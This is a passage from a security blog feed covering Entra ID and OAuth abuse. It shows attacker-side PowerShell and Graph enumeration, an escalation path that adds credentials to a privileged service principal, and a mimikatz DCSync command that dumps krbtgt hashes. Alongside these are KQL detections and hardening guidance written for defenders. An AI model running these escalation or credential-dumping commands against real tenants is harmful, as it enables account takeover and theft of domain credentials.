style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># 3. Find service principals with high privileges</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">high_value_sps </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> requests</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://graph.microsoft.com/v1.0/servicePrincipals\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"?$select=id,displayName,appId,appRoles\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"&amp;$top=999\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    headers</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\">headers</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">json</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># 4. Check if the current user has any admin roles</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">my_roles </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> requests</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"https://graph.microsoft.com/v1.0/me/transitiveMemberOf/microsoft.graph.directoryRole\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    headers</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\">headers</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">json</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"step-2-privilege-escalation-paths\">Step 2: Privilege Escalation Paths<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#step-2-privilege-escalation-paths\" class=\"hash-link\" aria-label=\"Direct link to Step 2: Privilege Escalation Paths\" title=\"Direct link to Step 2: Privilege Escalation Paths\" translate=\"no\">​</a></h3>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"path-a-application-administrator--global-administrator\">Path A: Application Administrator → Global Administrator<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#path-a-application-administrator--global-administrator\" class=\"hash-link\" aria-label=\"Direct link to Path A: Application Administrator → Global Administrator\" title=\"Direct link to Path A: Application Administrator → Global Administrator\" translate=\"no\">​</a></h4>\n<p>An account with the Application Administrator role can add credentials to any application service principal. If any application has Global Admin-level permissions, this is a one-step escalation.</p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Attacker has Application Administrator role</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Find apps with Directory.ReadWrite.All or RoleManagement.ReadWrite.Directory</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$apps = Get-MgServicePrincipal -All</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$highPrivApps = foreach ($app in $apps) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $assignments = Get-MgServicePrincipalAppRoleAssignment -ServicePrincipalId $app.Id</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $highPriv = $assignments | Where-Object { </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        $_.ResourceDisplayName -eq \"Microsoft Graph\" -and</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        # These permissions are effectively Global Admin</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        $app.AppRoles.Value -match \"RoleManagement.ReadWrite|Directory.ReadWrite\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    if ($highPriv) { $app }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Add credential to high-priv app, use it to assign Global Admin to attacker account</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$cred = Add-MgServicePrincipalPassword -ServicePrincipalId $highPrivApps[0].Id -PasswordCredential @{</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    DisplayName = \"backup-credential\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    EndDateTime = (Get-Date).AddYears(1)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span></code></pre></div></div>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"path-b-hybrid-identity-abuse-cloud--on-premises\">Path B: Hybrid Identity Abuse (Cloud → On-Premises)<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#path-b-hybrid-identity-abuse-cloud--on-premises\" class=\"hash-link\" aria-label=\"Direct link to Path B: Hybrid Identity Abuse (Cloud → On-Premises)\" title=\"Direct link to Path B: Hybrid Identity Abuse (Cloud → On-Premises)\" translate=\"no\">​</a></h4>\n<p>If the tenant uses Entra Connect (formerly Azure AD Connect) for hybrid identity sync, the sync account has extensive on-premises Active Directory privileges. Compromising it is a path to on-premises domain admin.</p>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Identify Entra Connect sync account (usually MSOL_ or AAD_ prefix)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Get-ADUser -Filter {SamAccountName -like \"MSOL_*\" -or SamAccountName -like \"AAD_*\"} -Properties *</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># The sync account has DCSync rights on the domain by default</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># An attacker with its credentials can dump all AD hashes</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">mimikatz # lsadump::dcsync /domain:corp.local /user:krbtgt</span><br></span></code></pre></div></div>\n<h4 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"path-c-conditional-access-policy-gaps\">Path C: Conditional Access Policy Gaps<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#path-c-conditional-access-policy-gaps\" class=\"hash-link\" aria-label=\"Direct link to Path C: Conditional Access Policy Gaps\" title=\"Direct link to Path C: Conditional Access Policy Gaps\" translate=\"no\">​</a></h4>\n<p>Most organizations have Conditional Access policies protecting interactive logins but forget that:</p>\n<ul>\n<li class=\"\">Legacy authentication protocols (SMTP AUTH, IMAP, Exchange ActiveSync) bypass CA</li>\n<li class=\"\">Service principal authentication bypasses nearly all CA policies</li>\n<li class=\"\">Certain workload identities are excluded from policies for \"operational reasons\"</li>\n</ul>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Enumerate Conditional Access policies to find gaps</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Connect-MgGraph -Scopes \"Policy.Read.All\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">$policies = Get-MgIdentityConditionalAccessPolicy -All</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">foreach ($policy in $policies) {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Write-Output \"Policy: $($policy.DisplayName)\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Write-Output \"  State: $($policy.State)\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Write-Output \"  Excluded Users: $($policy.Conditions.Users.ExcludeUsers -join ', ')\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Write-Output \"  Excluded Groups: $($policy.Conditions.Users.ExcludeGroups -join ', ')\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Write-Output \"  Excluded Apps: $($policy.Conditions.Applications.ExcludeApplications -join ', ')\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Write-Output \"  Client App Types: $($policy.Conditions.ClientAppTypes -join ', ')\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    # Red flag: \"all\" is NOT in ClientAppTypes  legacy auth not blocked</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    if ($policy.Conditions.ClientAppTypes -notcontains \"exchangeActiveSync\" -and</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        $policy.Conditions.ClientAppTypes -notcontains \"other\") {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        Write-Output \"  *** LEGACY AUTH NOT COVERED ***\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">}</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"the-complete-detection-kill-chain\">The Complete Detection Kill Chain<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#the-complete-detection-kill-chain\" class=\"hash-link\" aria-label=\"Direct link to The Complete Detection Kill Chain\" title=\"Direct link to The Complete Detection Kill Chain\" translate=\"no\">​</a></h3>\n<p>For a SOC to catch this attack end-to-end, you need coverage across multiple log sources:</p>\n<!-- -->\n<div class=\"language-kusto codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-kusto codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// KQL: Master hunting query  chain of suspicious identity activity</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">let suspicious_users =</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    AADSignInLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | where AuthenticationProtocol == \"deviceCode\" or</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            (NetworkLocationDetails == \"[]\" and RiskLevelDuringSignIn in (\"high\", \"medium\"))</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | distinct UserPrincipalName;</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">AuditLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where TimeGenerated &gt; ago(7d)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where InitiatedBy.user.userPrincipalName in (suspicious_users)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where OperationName in (</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"Consent to application\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"Add service principal credentials\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"Add member to role\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"Add app role assignment to service principal\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"Update application\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"Set-InboxRule\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"New-InboxRule\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| project TimeGenerated, </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    User = InitiatedBy.user.userPrincipalName,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Operation = OperationName,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Target = TargetResources[0].displayName,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Result</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort by TimeGenerated asc</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"what-cisos-should-do-this-quarter\">What CISOs Should Do This Quarter<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#what-cisos-should-do-this-quarter\" class=\"hash-link\" aria-label=\"Direct link to What CISOs Should Do This Quarter\" title=\"Direct link to What CISOs Should Do This Quarter\" translate=\"no\">​</a></h2>\n<p>The detection queries and attack chains above are interesting, but what matters is what you change. Here are the highest-ROI controls ranked by impact vs. effort:</p>\n<!-- -->\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"priority-1-block-device-code-flow-highest-impact-low-effort\">Priority 1: Block Device Code Flow (Highest Impact, Low Effort)<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#priority-1-block-device-code-flow-highest-impact-low-effort\" class=\"hash-link\" aria-label=\"Direct link to Priority 1: Block Device Code Flow (Highest Impact, Low Effort)\" title=\"Direct link to Priority 1: Block Device Code Flow (Highest Impact, Low Effort)\" translate=\"no\">​</a></h3>\n<p>Create a Conditional Access policy that blocks the device code authentication flow for all users who don't legitimately need it (almost everyone in a standard enterprise).</p>\n<p><strong>Entra ID → Protection → Conditional Access → New Policy</strong></p>\n<ul>\n<li class=\"\">Users: All users (exclude break-glass accounts)</li>\n<li class=\"\">Cloud apps: All cloud apps</li>\n<li class=\"\">Conditions → Authentication flows → Device code flow: Yes</li>\n<li class=\"\">Grant: Block</li>\n</ul>\n<p>This single policy eliminates one of the most prevalent nation-state attack vectors.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"priority-2-restrict-user-consent-high-impact-low-effort\">Priority 2: Restrict User Consent (High Impact, Low Effort)<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#priority-2-restrict-user-consent-high-impact-low-effort\" class=\"hash-link\" aria-label=\"Direct link to Priority 2: Restrict User Consent (High Impact, Low Effort)\" title=\"Direct link to Priority 2: Restrict User Consent (High Impact, Low Effort)\" translate=\"no\">​</a></h3>\n<p><strong>Entra ID → Enterprise Applications → Consent and permissions → User consent settings</strong></p>\n<p>Set to: <em>\"Do not allow user consent\"</em> or at minimum <em>\"Allow user consent for apps from verified publishers for selected permissions only\"</em></p>\n<p>All third-party application consent should require admin approval. Yes, this creates IT tickets. Those tickets are preferable to a 90-day email forwarding rule the attacker is running silently.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"priority-3-audit-service-principal-credentials-high-impact-medium-effort\">Priority 3: Audit Service Principal Credentials (High Impact, Medium Effort)<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#priority-3-audit-service-principal-credentials-high-impact-medium-effort\" class=\"hash-link\" aria-label=\"Direct link to Priority 3: Audit Service Principal Credentials (High Impact, Medium Effort)\" title=\"Direct link to Priority 3: Audit Service Principal Credentials (High Impact, Medium Effort)\" translate=\"no\">​</a></h3>\n<p>Run the PowerShell enumeration from Section 4 against your tenant. You will find:</p>\n<ul>\n<li class=\"\">Applications with credentials that haven't been rotated in 2+ years</li>\n<li class=\"\">Credentials owned by employees who left the company</li>\n<li class=\"\">Applications with application permissions they don't need</li>\n<li class=\"\">Applications with Global Admin-equivalent permissions held by vendors</li>\n</ul>\n<div class=\"language-powershell codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-powershell codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Quick audit: service principals with credentials expiring far in future</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Connect-MgGraph -Scopes \"Application.Read.All\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Get-MgApplication -All | ForEach-Object {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $app = $_</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    $app.PasswordCredentials | Where-Object { </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        $_.EndDateTime -gt (Get-Date).AddYears(1) </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    } | ForEach-Object {</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        [PSCustomObject]@{</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            App         = $app.DisplayName</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            AppId       = $app.AppId</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            KeyName     = $_.DisplayName</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            Expires     = $_.EndDateTime</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            CreatedBy   = $_.CustomKeyIdentifier  # often null for old creds</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    }</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">} | Sort-Object Expires -Descending | Export-Csv \"long-lived-credentials.csv\"</span><br></span></code></pre></div></div>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"priority-4-enable-token-protection-conditional-access\">Priority 4: Enable Token Protection (Conditional Access)<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#priority-4-enable-token-protection-conditional-access\" class=\"hash-link\" aria-label=\"Direct link to Priority 4: Enable Token Protection (Conditional Access)\" title=\"Direct link to Priority 4: Enable Token Protection (Conditional Access)\" translate=\"no\">​</a></h3>\n<p>Entra ID's Token Protection feature (currently GA for service tokens, preview for sign-in tokens) binds tokens to the specific device they were issued on. Token replay from a different device fails, even with a valid refresh token.</p>\n<p><strong>Conditional Access → New Policy → Grant → Require token protection</strong></p>\n<p>This directly defeats AiTM phishing and token theft attacks.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"priority-5-implement-privileged-identity-management-pim\">Priority 5: Implement Privileged Identity Management (PIM)<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#priority-5-implement-privileged-identity-management-pim\" class=\"hash-link\" aria-label=\"Direct link to Priority 5: Implement Privileged Identity Management (PIM)\" title=\"Direct link to Priority 5: Implement Privileged Identity Management (PIM)\" translate=\"no\">​</a></h3>\n<p>Permanent Global Administrator assignments are the attacker's dream. Every privileged role should be:</p>\n<ul>\n<li class=\"\">Time-bound: Activated for 1–8 hours maximum</li>\n<li class=\"\">Approval-required for highest roles</li>\n<li class=\"\">MFA-gated on every activation</li>\n<li class=\"\">Audited: All activations logged and alertable</li>\n</ul>\n<p>A compromised Global Admin credential that has never had PIM enabled means the attacker has persistent, unrestricted admin access. A PIM-enabled environment means an attacker with a stolen credential has nothing without completing an activation workflow.</p>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"final-thought\">Final Thought<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#final-thought\" class=\"hash-link\" aria-label=\"Direct link to Final Thought\" title=\"Direct link to Final Thought\" translate=\"no\">​</a></h2>\n<p>The threat actors using these techniques  Midnight Blizzard, Scattered Spider, dozens of ransomware affiliates  are not sophisticated in the traditional sense. They are not writing novel exploits or reverse engineering kernels. They are exceptionally good at identity abuse and they are counting on the fact that your security controls were designed for a threat model from 2015.</p>\n<p>Fileless, identity-layer attacks beat EDR. They beat antivirus. They beat network monitoring. What they do not beat is:</p>\n<ul>\n<li class=\"\">Locked-down Conditional Access policies</li>\n<li class=\"\">Restricted consent settings</li>\n<li class=\"\">Actively monitored identity logs with purpose-built KQL detections</li>\n<li class=\"\">A SOC that understands what <code>AADNonInteractiveUserSignInLogs</code> means and checks it</li>\n</ul>\n<p>The signal is there. Attackers leave traces in every log source mentioned in this post. The question is whether your team is looking.</p>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"further-reading\">Further Reading<a href=\"https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware#further-reading\" class=\"hash-link\" aria-label=\"Direct link to Further Reading\" title=\"Direct link to Further Reading\" translate=\"no\">​</a></h2>\n<ul>\n<li class=\"\"><a class=\"\" href=\"https://inferencedefense.com/academy/apt-initial-access-to-domain-dominance-4-hours\">How APT Groups Pivot from Initial Access to Domain Dominance in Under 4 Hours</a>  see how OAuth token theft fits into a full attack chain</li>\n<li class=\"\"><a class=\"\" href=\"https://inferencedefense.com/academy/mfa-bypass-device-code-phishing-token-replay-conditional-access\">MFA Bypass in 2025–2026: Device Code Phishing, Token Replay</a>  deeper dive into device code phishing and PRT abuse</li>\n<li class=\"\"><a class=\"\" href=\"https://inferencedefense.com/academy/windows-event-log-architecture-siem-missing-events\">Windows Event Log Architecture: Why Your SIEM Is Missing 30% of Events</a>  ensure the identity events covered here are actually reaching your SIEM</li>\n</ul>\n<hr>\n<blockquote>\n<p>All commands and queries in this post are for defensive use  detection, auditing, and hardening. Test all detection queries in your environment against known-good baselines before using in production alerting.</p>\n</blockquote>",
            "url": "https://inferencedefense.com/academy/blog-internal/how-attackers-abuse-entra-id-oauth-without-malware",
            "title": "How Attackers Abuse Entra ID & OAuth Without Malware",
            "summary": "Exact techniques threat actors use to compromise Entra ID and OAuth without malware  token theft, device code phishing, consent abuse  plus KQL detections.",
            "date_modified": "2026-04-17T00:00:00.000Z",
            "author": {
                "name": "Inference Defense",
                "url": "https://inferencedefense.com"
            },
            "tags": [
                "entra-id",
                "oauth",
                "identity-security",
                "token-theft",
                "detection-engineering",
                "microsoft-365",
                "conditional-access"
            ]
        },
        {
            "id": "https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access",
            "content_html": "<blockquote>\n<p><em>Your user just completed MFA. They entered their authenticator code correctly. Microsoft accepted it. Your Conditional Access policy evaluated and passed. And the attacker  sitting at a server in a different country  just received a valid OAuth access token with 60-90 minutes of life, a refresh token valid for 90 days, and a path to your entire Microsoft 365 environment. No phishing page. No fake login form. No credential harvested. MFA was the mechanism the attacker used to authenticate on the victim's behalf. This is not a future threat. It has been actively exploited since at least mid-2024, and campaigns surged dramatically in late 2025.</em></p>\n</blockquote>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"why-mfa-is-no-longer-a-trust-boundary--its-an-authentication-step\">Why MFA Is No Longer a Trust Boundary  It's an Authentication Step<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#why-mfa-is-no-longer-a-trust-boundary--its-an-authentication-step\" class=\"hash-link\" aria-label=\"Direct link to Why MFA Is No Longer a Trust Boundary  It's an Authentication Step\" title=\"Direct link to Why MFA Is No Longer a Trust Boundary  It's an Authentication Step\" 